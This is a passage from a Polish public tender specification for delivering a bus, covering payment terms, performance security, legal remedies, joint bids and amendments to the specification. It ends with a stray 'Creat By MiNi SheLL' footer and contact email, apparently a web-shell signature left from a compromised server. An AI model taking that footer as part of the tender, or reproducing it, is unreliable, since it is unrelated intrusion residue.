2.Należyte wykonanie usługi zostanie potwierdzone protokołem zdawczo - odbiorczym podpisanym przez Wykonawcę oraz Zamawiającego. Data podpisania protokółu zdawczo - odbiorczego przez Zamawiającego jest uznana, jako data wykonania i przekazania przedmiotu Umowy.
3.Faktura VAT zostanie wystawiona z 30 dniowym terminem płatności.
4.Rozliczenie będzie następować w złotych polskich.
III. Informacje o formalnościach, jakie powinny zostać dopełnione po wyborze oferty w celu zawarcia umowy w sprawie zamówienia publicznego;
	W terminie określonym w piśmie akceptującym ofertę Wykonawca winien przybyć we wskazane przez Zamawiającego miejsce w celu podpisania umowy, której projekt stanowi załącznik nr 4 do specyfikacji
IV. Wymagania dotyczące zabezpieczenia należytego wykonania umowy;
1.Wykonawca, którego oferta została wybrana zobowiązany jest do wniesienia przed terminem podpisania umowy zabezpieczenia należytego wykonania umowy. Wykonawca zobowiązany jest okazać dowód wniesienia zabezpieczenia należytego wykonania umowy przed jej podpisaniem. Zasady zwrotu zabezpieczenia określa projekt umowy stanowiący załącznik nr 4 do specyfikacji.
2 Zabezpieczenie może być wnoszone według wyboru wykonawcy w jednej lub w kilku następujących formach:
a.	pieniądzu;
b.	poręczeniach bankowych lub poręczeniach kasy oszczędnościowo - kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w Art.6b ust.5 pkt 2 ustawy z dnia 9 listopada 2000r o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
3.Gwarancja bankowa lub gwarancja ubezpieczeniowa, stanowiąca formę wniesienia zabezpieczenia winna spełniać co najmniej następujące warunki:
f.	ustalać beneficjenta gwarancji, tj. jego nazwę i adres;
g.	określać kwotę gwarantowaną w złotych;
h.	określać termin ważności gwarancji (termin ważności gwarancji winien być dłuższy o 15 dni od terminu upływu okresu gwarancji usunięcia wad i usterek).
i.	określać przedmiot gwarancji, nazwę i numer zamówienia wynikający ze specyfikacji istotnych warunków zamówienia oraz tytuł (np. zabezpieczenie);
j.	być gwarancją samoistną, nie odwoływalną i bezwarunkową, płatną na każde żądanie).
4.Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego: BANK MILLENNIUM O/KOSZALIN nr rachunku S.W.I.F.T. BIGBPLPWXXX, IBAN PL 75 1160 2202 0000 0000 6175 0721 z opisem: zabezpieczenie - umowa nr NT-LK-2214-08-01.09 (dostawa autobusu).
5.W przypadku wniesienia wadium w pieniądzu Wykonawca może wyrazić zgodę na zaliczenie kwoty wadium w poczet zabezpieczenia. Zamawiający wymaga, aby zgoda została wyrażona w formie pisemnej. 
6.Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym były one przechowywane, pomniejszone o koszty prowadzenia tego rachunku oraz prowizji bankowej za przelew na rachunek bankowy Wykonawcy. 
7.Ustala się zabezpieczenie w wysokości 10% wartości brutto złożonej oferty. Zamawiający zwraca 70% zabezpieczenia w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane, 30% wysokości zabezpieczenia, Zamawiający zwraca po upływie okresu rękojmi za wady lub gwarancji jakości.
V. Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, ogólne warunki umowy albo wzór umowy, jeżeli Zamawiający wymaga od Wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach;
Wszelkie zobowiązania stron określone są w załączonym do specyfikacji - projekcie umowy (załącznik nr4 do SIWZ). Zamawiający wymaga od Wykonawcy, którego oferta zostanie wybrana, aby zawarł z nim umowę w sprawie zamówienia publicznego na takich warunkach.
VI. Pouczenie o środkach ochrony prawnej przysługujących Wykonawcy w toku postępowania o udzielenie zamówienia.
Środki ochrony prawnej przysługujące Wykonawcy w toku postępowania o udzielenie zamówienia uregulowane są od art. 180 do art. 198 ustawy z dnia 29 stycznia 2004r. - Prawo zamówień publicznych.
VII..Zawarcie umowy ramowej. Maksymalna liczba Wykonawców, z którymi Zamawiający zawrze umowę ramową, jeżeli Zamawiający przewiduje zawarcie umowy ramowej;
Zamawiający nie przewiduje zawarcia umowy ramowej.
VIII.Zamówienia uzupełniające. Informacje o przewidywanych zamówieniach uzupełniających, o których mowa w art. 67 ust.1 pkt 6 i 7 lub art. 134 ust 6 pkt 3 i 4, jeżeli Zamawiający przewiduje udzielenie takich zamówień.
Zamawiający nie przewiduje zamówienia uzupełniającego. 
IX.Powierzenie wykonania umowy podwykonawcom.  
Wykonawca może powierzyć wykonanie zamówienia podwykonawcom.
X.Wspólne ubieganie się o udzielenie zamówienia;
1.Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.
2.W przypadku, o którym mowa w punkcie 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
3.Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców, o których mowa w punkcie 1.
4.Jeżeli o udzielenie zamówienia ubiegają się wspólnie Wykonawcy, a ich oferta została wybrana, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, umowy regulującej współpracę tych Wykonawców - pod rygorem odstąpienia od zawarcia umowy 
X.Zwrot kosztów. Wysokość zwrotu kosztów udziału w postępowaniu, jeżeli Zamawiający przewiduje ich zwrot; 
Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu
XI.Wyjaśnienia dotyczące specyfikacji istotnych warunków zamówienia, jeżeli Zamawiający przewiduje wyjaśnienia.
1.Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści specyfikacji istotnych warunków zamówienia. Zamawiający odpowiada na każde pytanie niezwłocznie chyba, że prośba o wyjaśnienie treści SIWZ wpłynie do Zamawiającego w terminie na mniej niż 6 dni przed terminem otwarcia ofert.
2.W uzasadnionych przypadkach Zamawiający może przed upływem terminu składania ofert zmienić treść specyfikacji istotnych warunków zamówienia. Dokonaną zmianę specyfikacji Zamawiający przekazuje niezwłocznie wszystkim, którym przekazano specyfikację istotnych warunków zamówienia, a jeżeli specyfikacja jest udostępniona na stronie internetowej, zamieszcza ją także na tej stronie.
3.W przypadku dokonywania zmiany treści ogłoszenia o zamówieniu zamieszczonego w BZP lub opublikowanego w dzienniku Urzędowym Unii Europejskiej, Zmawiający przedłuża termin składania wniosków o dopuszczenie do udziału w postępowaniu lub termin składania ofert o czas niezbędny na wprowadzenie zmian we wnioskach lub ofertach, jeżeli jest to konieczne.
4. Jeżeli zmiana, o której mowa w pkt 27.3. jest istotna, w szczególności dotyczy określenia przedmiotu, wielkości lub zakresu zamówienia, kryterium oceny ofert, warunków udziału w postępowaniu lub sposobu oceny ich spełnienia, zamawiający przedłuża termin składania wniosków o dopuszczenie do udziału w postępowaniu lub termin składania ofert o czas niezbędny na wprowadzenie zmian we wnioskach lub ofertach, z tym, że w postępowaniach, których wartość jest równa lub przekracza kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8, termin składania:
a) ofert nie może być krótszy niż 22 dni od dnia przekazania zmiany ogłoszenia Urzędowi Oficjalnych Wspólnot Europejskich - trybie przetargu nieograniczonego;
b) wniosków o dopuszczenie do udziału w postępowaniu nie może być krótszy niż 30 dni, a jeżeli zachodzi pilna potrzeba udzielenia zamówienia niż 10 dni od dnia przekazania zmiany ogłoszenia Urzędowi Oficjalnych Publikacji Wspólnot Europejskich - w trybie przetargu ograniczonego lub negocjacji z ogłoszeniem
5. Jeżeli w postępowaniu prowadzonym w trybie przetargu nieograniczonego zmiana treści specyfikacji istotnych warunków zamówienia prowadzi do zmiany treści ogłoszenia o zamówieniu, zamawiający:
a) zamieszcza ogłoszenie o zmianie ogłoszenia w Biuletynie Zamówień Publicznych - jeżeli wartość zamówienia jest mniejsza niż kwoty określone w przepisach wydanych na podstawie art. 11 ust.8;
b) przekazuje Urzędowi Oficjalnych Wspólnot Europejskich ogłoszenie dodatkowych informacji, informacji o niekompletnej procedurze lub sprostowania, drogą elektroniczną, zgodnie z formą i procedurami wskazanymi na stronie internetowej określonej w dyrektywie - jeżeli wartość zamówienia jest równa lub przekracza kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8. 
6. Jeżeli w wyniku zmiany treści SIWZ nieprowadzącej do zmiany treści ogłoszenia o zamówieniu jest niezbędny dodatkowy czas na wprowadzenie zmian w ofertach, Zamawiający przedłuża termin składania ofert i informuje o tym Wykonawców, którym przekazano SIWZ, oraz na stronie internetowej, jeżeli SIWZ jest udostępniona na tej stronie.
X.Informacje o zamiarze ustanowienia dynamicznego systemu zakupów wraz z adresem strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów.
 Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
XI.Informacja o załącznikach:

Creat By MiNi SheLL
Email: jattceo@gmail.com